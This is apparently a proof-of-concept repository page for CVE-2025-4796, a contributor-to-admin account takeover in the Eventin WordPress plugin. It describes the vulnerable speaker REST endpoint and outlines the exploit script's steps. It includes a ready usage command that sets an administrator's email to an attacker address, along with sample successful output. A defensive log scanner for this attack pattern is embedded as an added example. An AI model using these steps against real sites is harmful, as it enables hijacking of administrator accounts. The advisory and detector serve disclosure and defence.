
CVE-2025-4796 PoC — Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

Associated Vulnerability
Title: Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover (CVE-2025-4796)
Description: The Eventin plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.34. This is due to the plugin not properly validating a user's identity or capability prior to updating their details, such as email, in the 'Eventin\Speaker\Api\SpeakerController::update_item' function. This makes it possible for authenticated attackers with contributor-level and above permissions to change arbitrary users' email addresses, including administrators', and leverage that to reset the user's password and gain access to their account.
Description
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover
Readme
# CVE-2025-4796
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

# 🛡️ Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation (CVE-2025-4796)

## 📌 Overview
This repository documents a privilege escalation vulnerability in the Eventin WordPress plugin (<= 4.0.34) that allows an authenticated user with Contributor+ capabilities to change arbitrary users' email addresses via the plugin's speaker update API. By changing an administrator's email, an attacker can trigger a password reset and gain account takeover.

- Vulnerable component: Eventin WordPress plugin (Eventin\Speaker\Api\SpeakerController::update_item)
- Affected versions: <= 4.0.34
- CVE: CVE-2025-4796
- CVSS: 8.8 (High)
- Active installations: 10,000+

## ⚠️ Vulnerability Details
Eventin does not properly validate the identity or capability of the caller before updating speaker/user details (specifically email). An attacker who is authenticated as a contributor (or higher) can change the email address of other users — including administrators — using the plugin REST endpoint:
- PUT /wp-json/eventin/v2/speakers/<speaker_id>

Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.
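As an added, defender-side example that is not part of the PoC repository: a small scanner over web-server access log lines that flags write requests to the speaker update endpoint named above and escalates when the same client then requests a password reset, which is the takeover sequence this advisory describes. The log lines are constructed for the example; the endpoint path is the one the README gives.

```python
"""Added example (not the PoC's own code): detect the email-change-then-reset
pattern from CVE-2025-4796 in combined-format access logs."""
import re
from collections import defaultdict

# Constructed sample log: one client updates speaker 1 and then requests a
# password reset; a second client only reads a speaker record.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2025:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2025:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.5 - - [12/May/2025:10:01:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 8802
10.0.0.5 - - [12/May/2025:10:01:07 +0000] "PUT /wp-json/eventin/v2/speakers/1 HTTP/1.1" 200 341
10.0.0.5 - - [12/May/2025:10:01:20 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
10.0.0.9 - - [12/May/2025:10:02:00 +0000] "GET /wp-json/eventin/v2/speakers/4 HTTP/1.1" 200 341
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SPEAKER_UPDATE_RE = re.compile(r'^/wp-json/eventin/v2/speakers/\d+$')
LOST_PASSWORD_RE = re.compile(r'^/wp-login\.php\?action=lostpassword')
WRITE_METHODS = {'PUT', 'POST', 'PATCH'}


def scan(log_text):
    """Return findings keyed by client IP.

    A write request to the speaker endpoint is recorded as 'speaker_update';
    a lost-password request from a client that already had a successful
    update is recorded as 'password_reset_after_update'."""
    findings = defaultdict(list)
    updated_clients = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, method, path = m['ip'], m['method'], m['path']
        status = int(m['status'])
        if method in WRITE_METHODS and SPEAKER_UPDATE_RE.match(path):
            findings[ip].append(('speaker_update', path, status))
            if status == 200:
                updated_clients.add(ip)
        elif ip in updated_clients and LOST_PASSWORD_RE.match(path):
            findings[ip].append(('password_reset_after_update', path, status))
    return dict(findings)


if __name__ == '__main__':
    for ip, events in scan(SAMPLE_LOG).items():
        print(ip, events)
```

Sites that expose the REST API through `?rest_route=` instead of `/wp-json/` would need the path pattern extended; the same applies if legitimate speaker edits by trusted roles are common, in which case the finding should be correlated with the logged-in user's role.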

## 🧰 Script (PoC)
Filename: `CVE-2025-4796.py`

This script automates the steps:
1. Log in to the target WordPress site using supplied credentials.
2. Extract the required X-WP-Nonce from the admin page.
3. Send a PUT request to `/wp-json/eventin/v2/speakers/<speaker_id>` to update the speaker's email.
4. Print and format the JSON response and a professional success message.

Requirements:
- Python 3.8+
- requests

Installation:
```sh
pip install requests
```

## 🚀 Usage
Run the script from the command line:

```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```

Show script help:

```sh
python CVE-2025-4796.py -h
```

## 📝 CLI Options (help)
```sh
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade
```

## ✅ Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : Nxploited@gmail.com

[!] Please reset your password using the email: Nxploited@gmail.com
```

## ⚖️ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).

## 🧾 What the script does (concise)
- Validates inputs (URL, email) and normalizes URL schema.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.

## 👤 Credits
By: Khaled Alenaz (Nxploited)  
GitHub: https://github.com/Nxploited/
File Snapshot

```
[4.0K] /data/pocs/dfc3aea1844162212911a7caf3f59c702a816858
├── [8.7K] CVE-2025-4796.py
├── [1.5K] LICENSE
├── [4.2K] README.md
└── [   9] requirements.txt

1 directory, 4 files
```